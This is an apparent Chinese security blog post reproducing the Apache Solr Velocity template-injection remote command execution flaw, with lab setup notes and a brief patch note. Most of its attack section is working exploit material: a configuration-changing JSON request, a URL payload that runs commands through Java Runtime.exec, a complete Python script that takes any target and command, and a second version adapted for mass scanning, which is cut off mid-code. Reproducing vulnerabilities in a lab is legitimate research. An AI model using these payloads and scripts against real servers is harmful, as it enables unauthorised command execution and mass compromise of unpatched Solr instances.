<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl">
  
  
  
  
  <title>Solr Velocity rce | Whitesun</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写作者：Whitesun 0x01 漏洞概述19年10月31日，安全研究员S00pY在GitHub发布了ApacheSolr Velocity模版注入远程命令执行的POC，经过其他安全团队和人员的验证和复现，此漏洞已经能够被批量利用。  https://gist.githubusercontent.com/s00py/">
<meta name="keywords" content="Solr">
<meta property="og:type" content="article">
<meta property="og:title" content="Solr Velocity rce">
<meta property="og:url" content="http://yoursite.com/2020/01/07/Solr-Velocity-rce/index.html">
<meta property="og:site_name" content="Whitesun">
<meta property="og:description" content="Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写作者：Whitesun 0x01 漏洞概述19年10月31日，安全研究员S00pY在GitHub发布了ApacheSolr Velocity模版注入远程命令执行的POC，经过其他安全团队和人员的验证和复现，此漏洞已经能够被批量利用。  https://gist.githubusercontent.com/s00py/">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/1578276051044.png">
<meta property="og:image" content="http://yoursite.com/img/1578276338655.png">
<meta property="og:image" content="http://yoursite.com/img/1578276560216.png">
<meta property="og:image" content="http://yoursite.com/img/1578277325466.png">
<meta property="og:image" content="http://yoursite.com/img/1578278035752.png">
<meta property="og:image" content="http://yoursite.com/img/1578278904477.png">
<meta property="og:image" content="http://yoursite.com/img/1578278140818.png">
<meta property="og:image" content="http://yoursite.com/img/1578279117695.png">
<meta property="og:image" content="http://yoursite.com/img/1578279445556.png">
<meta property="og:image" content="http://yoursite.com/img/1578280225613.png">
<meta property="og:image" content="http://yoursite.com/img/1578280236707.png">
<meta property="og:image" content="http://yoursite.com/img/1578279815956.png">
<meta property="og:image" content="http://yoursite.com/img/1578280695409.png">
<meta property="og:updated_time" content="2020-01-15T07:10:05.217Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Solr Velocity rce">
<meta name="twitter:description" content="Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写作者：Whitesun 0x01 漏洞概述19年10月31日，安全研究员S00pY在GitHub发布了ApacheSolr Velocity模版注入远程命令执行的POC，经过其他安全团队和人员的验证和复现，此漏洞已经能够被批量利用。  https://gist.githubusercontent.com/s00py/">
<meta name="twitter:image" content="http://yoursite.com/img/1578276051044.png">
  
    <link rel="alternative" href="/atom.xml" title="Whitesun" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/spider1.jpg">
  
  
  <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/niceboy1.jpg" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">小白</a></h1>
        </hgroup>
        
        <p class="header-subtitle">有梦想的小菜鸡</p>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/categories/渗透测试/">渗透测试</a></li>
                        
                            <li><a href="/categories/php">PHP</a></li>
                        
                            <li><a href="/categories/python工具开发">Python工具开发</a></li>
                        
                            <li><a href="/categories/故事短句">故事短句</a></li>
                        
                            <li><a href="/categories/LOVER">MY LOVER</a></li>
                        
                            <li><a href="/categories/信安之路学习">信安之路学习</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="https://github.com/qwe844607333/qwe844607333.github.io" title="github">github</a>
                            
                                <a class="fl weibo" target="_blank" href="https://weibo.com/" title="weibo">weibo</a>
                            
                                <a class="fl rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Solr/" style="font-size: 10px;">Solr</a> <a href="/tags/metasploit/" style="font-size: 10px;">metasploit</a> <a href="/tags/sad/" style="font-size: 10px;">sad~</a> <a href="/tags/weblogic-RCE/" style="font-size: 10px;">weblogic RCE</a> <a href="/tags/web安全/" style="font-size: 10px;">web安全</a> <a href="/tags/丧/" style="font-size: 10px;">丧</a> <a href="/tags/信安之路/" style="font-size: 10px;">信安之路</a> <a href="/tags/小童/" style="font-size: 10px;">小童</a> <a href="/tags/日常/" style="font-size: 20px;">日常</a>
                    </div>
                </section>
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://jiubaeryi9821.github.io/">9821</a>
                    
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">我从来不想独身~</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">小白</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/niceboy1.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">小白</a></h1>
            </hgroup>
            
            <p class="header-subtitle">有梦想的小菜鸡</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/categories/渗透测试/">渗透测试</a></li>
                
                    <li><a href="/categories/php">PHP</a></li>
                
                    <li><a href="/categories/python工具开发">Python工具开发</a></li>
                
                    <li><a href="/categories/故事短句">故事短句</a></li>
                
                    <li><a href="/categories/LOVER">MY LOVER</a></li>
                
                    <li><a href="/categories/信安之路学习">信安之路学习</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/qwe844607333/qwe844607333.github.io" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="https://weibo.com/" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-Solr-Velocity-rce" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/01/07/Solr-Velocity-rce/" class="article-date">
      <time datetime="2020-01-07T01:40:53.000Z" itemprop="datePublished">2020-01-07</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Solr Velocity rce
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/渗透测试/">渗透测试</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Solr/">Solr</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="Apache-Solr-Velocity模版注入远程命令执行漏洞复现以及POC编写"><a href="#Apache-Solr-Velocity模版注入远程命令执行漏洞复现以及POC编写" class="headerlink" title="Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写"></a>Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写</h2><p>作者：Whitesun</p>
<h4 id="0x01-漏洞概述"><a href="#0x01-漏洞概述" class="headerlink" title="0x01 漏洞概述"></a>0x01 漏洞概述</h4><p>19年10月31日，安全研究员S00pY在GitHub发布了ApacheSolr Velocity模版注入远程命令执行的POC，经过其他安全团队和人员的验证和复现，此漏洞已经能够被批量利用。</p>
<p><img src="\img\1578276051044.png" alt></p>
<p><a href="https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/" target="_blank" rel="noopener">https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/</a></p>
<p>该漏洞的产生原因：Apache Solr默认集成VelocityResponseWriter插件，在该插件的初始化参数中，params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版，默认设置是false。</p>
<p>当params.resource.loader.enabled设置为true，将允许用户通过设置请求中的参数来指定相关资源的加载，这也就意味着攻击者可以通过构造一个恶意的POST请求，将params.resource.loader.enabled的值修改为true，在服务器上进行命令执行,从而获取服务器的权限。如果在赔上solr未授权访问漏洞，存在于外网的大部分solr服务器将不堪一击！</p>
<p>关于params.resource.loader.enabled的介绍:</p>
<p><a href="https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html" target="_blank" rel="noopener">https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html</a></p>
<h4 id="0x02-影响范围"><a href="#0x02-影响范围" class="headerlink" title="0x02 影响范围"></a>0x02 影响范围</h4><p>solr 4.x~solr 8.2 版本</p>
<a id="more"></a>
<h4 id="0x03-本地复现"><a href="#0x03-本地复现" class="headerlink" title="0x03 本地复现"></a>0x03 本地复现</h4><p>通过清华大学镜像站下载个7.7版本的solr</p>
<p><img src="\img\1578276338655.png" alt="1578276338655"></p>
<p><a href="https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/" target="_blank" rel="noopener">https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/</a></p>
<p>安装到kail，因为在kail上可以不用再去配置Java环境。（使用docker也可以）</p>
<p>我直接解压到桌面然后启动起来，启动记得加上 -force ，不然会提示你存在安全风险。</p>
<p>cd solr-7.7.2/</p>
<p>./bin/solr start -force</p>
<p><img src="\img\1578276560216.png" alt="1578276560216"></p>
<p>可以看到solr服务已经启动起来，默认端口为8983。接下来我们使用浏览器访问solr，此时没做任何配置是存在solr未授权访问的，所以只在浏览器新建一个core。（可能会遇到无法添加core问题，将 /solr-7.7.0/server/solr/configsets/_default 下的 conf 文件夹复制到 new_core 文件夹下即可。）</p>
<p>我这里已经添加成功了，现在就可以利用安全研究员S00pY所提供的的POC来验证即可。</p>
<p><img src="\img\1578277325466.png" alt="1578277325466"></p>
<p>这个POC的思路是向某个core的config文件POST发送一个json格式的数据包，将 params.resource.loader.enabled 设置为 ture（默认为false）</p>
<p><img src="\img\1578278035752.png" alt="1578278035752"></p>
<p>当返回包为200（某些低版本为500）时，就说明我们修改的配置已经生效可以进行命令执行。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line"> <span class="attr">"update-queryresponsewriter"</span>: &#123;</span><br><span class="line">   <span class="attr">"startup"</span>: <span class="string">"lazy"</span>,</span><br><span class="line">   <span class="attr">"name"</span>: <span class="string">"velocity"</span>,</span><br><span class="line">   <span class="attr">"class"</span>: <span class="string">"solr.VelocityResponseWriter"</span>,</span><br><span class="line">    <span class="attr">"template.base.dir"</span>:<span class="string">""</span>,</span><br><span class="line">   <span class="attr">"solr.resource.loader.enabled"</span>: <span class="string">"true"</span>,</span><br><span class="line">   <span class="attr">"params.resource.loader.enabled"</span>: <span class="string">"true"</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="\img\1578278904477.png" alt="1578278904477"></p>
<p>此时，在查看new_core的config的params.resource.loader.enabled 的值，已经为ture</p>
<p><img src="\img\1578278140818.png" alt="1578278140818"></p>
<p>此时，利用给出的poc直接访问即可。</p>
<p><code>&lt;http://192.168.153.131:8983/solr/new_core/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end&gt;</code></p>
<p><img src="\img\1578279117695.png" alt="1578279117695"></p>
<p>相关分析：</p>
<p>在现今的软件开发过程中，软件开发人员将更多的精力投入在了重复的相似劳动中。特别是在如今特别流行的 MVC 架构模式中，软件各个层次的功能更加独立，同时代码的相似度也更加高。所以我们需要寻找一种来减少软件开发人员重复劳动的方法，让程序员将更多的精力放在业务逻辑以及其他更加具有创造力的工作上。Velocity 这个模板引擎就可以在一定程度上解决这个问题。</p>
<p>Velocity 是一个基于 Java 的模板引擎框架，提供的模板语言可以使用在 Java 中定义的对象和变量上。Velocity 是 Apache 基金会的项目，开发的目标是分离 MVC 模式中的持久化层和业务层。但是在实际应用过程中，Velocity 不仅仅被用在了 MVC 的架构中，还可以被用在以下一些场景中。</p>
<ol>
<li>Web 应用：开发者在不使用 JSP 的情况下，可以用 Velocity 让 HTML 具有动态内容的特性。</li>
<li>源代码生成：Velocity 可以被用来生成 Java 代码、SQL 或者 PostScript。有很多开源和商业开发的软件是使用 Velocity 来开发的。</li>
<li>自动 Email：很多软件的用户注册、密码提醒或者报表都是使用 Velocity 来自动生成的。使用 Velocity 可以在文本文件里面生成邮件内容，而不是在 Java 代码中拼接字符串。</li>
<li>转换 xml：Velocity 提供一个叫 Anakia 的 ant 任务，可以读取 XML 文件并让它能够被 Velocity 模板读取。一个比较普遍的应用是将 xdoc 文档转换成带样式的 HTML 文件。</li>
</ol>
<p>它允许任何人仅仅使用简单的模板语言（template language）来引用由java代码定义的对象。Velocity可以获取在java语言中定义的对象，从而实现界面和java代码的真正分离，这意味着可以使用Velocity替代jsp的开发模式了</p>
<p>当Velocity应用于Web开发时，界面设计人员可以和java程序开发人员同步开发一个遵循MVC架构的web站点，也就是说，页面设计人员可以只关注页面的显示效果，而由java程序开发人员关注业务逻辑编码。Velocity将java代码从web页面中分离出来，这样为web站点的长期维护提供了便利，同时也为我们在JSP和PHP之外又提供了一种可选的方案。</p>
<p>针对这个漏洞，大概来说的话，因为Velocity模板语言可以使用在 Java 中定义的对象和变量上。这个payload的核心就是构造了一个自定义的Velocity模板，来通过Java的Runtime.getRuntime().exec()来执行命令</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p = <span class="string">"/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName('java.lang.String'))+%23set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"</span></span><br></pre></td></tr></table></figure>
<p>对这个一些payload的参数进行解释。</p>
<ul>
<li>参数wt - 输出结果格式，通常为json/xml等格式，如果设置值为velocity，则会通过velocity引擎解析（重点）</li>
<li>参数v.template - 模版名称，payload设置模版名称为custom</li>
<li>参数v.template.custom - 自定义模板custom 的具体内容。也就是我们通过这个自定义的模板来执行命令。</li>
</ul>
<p>现在相信大家对于这个payload就有比较清晰的理解了，无奈本人对于Java也只处于了解一点的程度。更加深层次的分析参考seebug和先知社区。</p>
<p><a href="https://paper.seebug.org/1107/" target="_blank" rel="noopener">https://paper.seebug.org/1107/</a></p>
<p><a href="https://xz.aliyun.com/t/6700" target="_blank" rel="noopener">https://xz.aliyun.com/t/6700</a></p>
<h4 id="0x04-修补方法"><a href="#0x04-修补方法" class="headerlink" title="0x04 修补方法"></a>0x04 修补方法</h4><p>修补方法：升级到最新的solr8.4版本</p>
<h4 id="0x05-POC编写"><a href="#0x05-POC编写" class="headerlink" title="0x05 POC编写"></a>0x05 POC编写</h4><p>知道这个漏洞的实现原理后POC的编写就很简单了，利用python2.7编写。用到了sys、request、json模块。这里最后把输入的命令进行下URL编码。也就是POC中的CMD。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> quote_plus</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">(url, cmd)</span>:</span></span><br><span class="line"><span class="comment"># def main(url):</span></span><br><span class="line">    core_selector_url = url + <span class="string">'/solr/admin/cores?_=1565526689592&amp;indexInfo=false&amp;wt=json'</span></span><br><span class="line"></span><br><span class="line">    r = requests.get(url=core_selector_url)</span><br><span class="line">    json_strs = json.loads(r.text)</span><br><span class="line">    <span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">"responseHeader"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">        list = []</span><br><span class="line">        <span class="keyword">for</span> core_selector <span class="keyword">in</span> json_strs[<span class="string">'status'</span>]:</span><br><span class="line">            list.append(json_strs[<span class="string">'status'</span>][<span class="string">'%s'</span> % core_selector][<span class="string">'name'</span>])</span><br><span class="line">        jas502n_Core_Name = list[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    newurl = url + <span class="string">'/solr/'</span> + jas502n_Core_Name + <span class="string">'/config'</span></span><br><span class="line">    modifyConfig_headers = &#123;<span class="string">"Cache-Control"</span>: <span class="string">"max-age=0"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>,</span><br><span class="line">                            <span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3875.120 Safari/537.36"</span>,</span><br><span class="line">                            <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"</span>,</span><br><span class="line">                            <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.9"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>,</span><br><span class="line">                            <span class="string">"Content-Type"</span>: <span class="string">"application/json"</span>&#125;</span><br><span class="line"></span><br><span class="line">    modifyConfig_json = &#123;</span><br><span class="line">        <span class="string">"update-queryresponsewriter"</span>: &#123;<span class="string">"startup"</span>: <span class="string">"lazy"</span>, <span class="string">"name"</span>: <span class="string">"velocity"</span>,</span><br><span class="line">                                       <span class="string">"class"</span>: <span class="string">"solr.VelocityResponseWriter"</span>,</span><br><span class="line">                                       <span class="string">"template.base.dir"</span>: <span class="string">""</span>, <span class="string">"solr.resource.loader.enabled"</span>: <span class="string">"true"</span>,</span><br><span class="line">                                       <span class="string">"params.resource.loader.enabled"</span>: <span class="string">"true"</span>&#125;&#125;</span><br><span class="line">    <span class="comment">#data=json.dumps(payload)</span></span><br><span class="line">    res = requests.post(newurl, headers=modifyConfig_headers,json=modifyConfig_json)</span><br><span class="line">    cmd = quote_plus(cmd)</span><br><span class="line">    <span class="keyword">if</span> res.status_code == <span class="number">200</span> <span class="keyword">or</span> <span class="number">500</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = <span class="string">"/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName('java.lang.String'))+%23set($ex=$rt.getRuntime().exec('&#123;&#125;'))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"</span>.format(</span><br><span class="line">                cmd)</span><br><span class="line">            target = url + <span class="string">'/solr/'</span> + jas502n_Core_Name + p</span><br><span class="line">            <span class="keyword">print</span> <span class="string">u'命令执行url：'</span></span><br><span class="line">            <span class="keyword">print</span> target</span><br><span class="line">            result = requests.get(url=target)</span><br><span class="line">            <span class="keyword">if</span> result.status_code == <span class="number">200</span> <span class="keyword">and</span> len(result.text) &lt; <span class="number">65</span>:</span><br><span class="line">                <span class="keyword">print</span> <span class="string">u'命令执行结果：'</span></span><br><span class="line">                <span class="keyword">print</span> result.content</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="keyword">print</span></span><br><span class="line">            <span class="string">'failed'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    <span class="keyword">print</span></span><br><span class="line">    main(sys.argv[<span class="number">1</span>], sys.argv[<span class="number">2</span>])</span><br></pre></td></tr></table></figure>
<p>POC使用时直接加上url就行，但是url最后不要有斜杠。</p>
<p><img src="\img\1578279445556.png" alt="1578279445556"></p>
<h4 id="0x06-批量验证"><a href="#0x06-批量验证" class="headerlink" title="0x06 批量验证"></a>0x06 批量验证</h4><p>采用Xyntax大佬的渗透测试插件化并发框架 POC-T</p>
<p><a href="https://github.com/Xyntax/POC-T" target="_blank" rel="noopener">https://github.com/Xyntax/POC-T</a></p>
<p><img src="\img\1578280225613.png" alt="1578280225613"></p>
<p><img src="\img\1578280236707.png" alt="1578280236707"></p>
<p>这个框架实现漏洞验证非常简便而对于POC的编写也很友好。</p>
<p><img src="\img\1578279815956.png" alt="1578279815956"></p>
<p>将我们的代码稍微改进一下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">poc</span><span class="params">(url)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'://'</span> <span class="keyword">not</span> <span class="keyword">in</span> url:</span><br><span class="line">        url = <span class="string">'http://'</span> + url</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        core_selector_url = url + <span class="string">'/solr/admin/cores?_=1565526689592&amp;indexInfo=false&amp;wt=json'</span></span><br><span class="line"></span><br><span class="line">        r = requests.get(url=core_selector_url)</span><br><span class="line">        json_strs = json.loads(r.text)</span><br><span class="line">        <span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">"responseHeader"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            list = []</span><br><span class="line">            <span class="keyword">for</span> core_selector <span class="keyword">in</span> json_strs[<span class="string">'status'</span>]:</span><br><span class="line">                list.append(json_strs[<span class="string">'status'</span>][<span class="string">'%s'</span> % core_selector][<span class="string">'name'</span>])</span><br><span class="line">            jas502n_Core_Name = list[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">        debug_model_url = url + <span class="string">'/solr/'</span> + jas502n_Core_Name + <span class="string">'/config'</span></span><br><span class="line">        modifyConfig_headers = &#123;<span class="string">"Cache-Control"</span>: <span class="string">"max-age=0"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>,</span><br><span class="line">                                <span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3875.120 Safari/537.36"</span>,</span><br><span class="line">                                <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"</span>,</span><br><span class="line">                                <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.9"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>,</span><br><span class="line">                                <span class="string">"Content-Type"</span>: <span class="string">"application/json"</span>&#125;</span><br><span class="line"></span><br><span class="line">        modifyConfig_json = &#123;</span><br><span class="line">            <span class="string">"update-queryresponsewriter"</span>: &#123;<span class="string">"startup"</span>: <span class="string">"lazy"</span>, <span class="string">"name"</span>: <span class="string">"velocity"</span>,</span><br><span class="line">                                               <span class="string">"class"</span>: <span 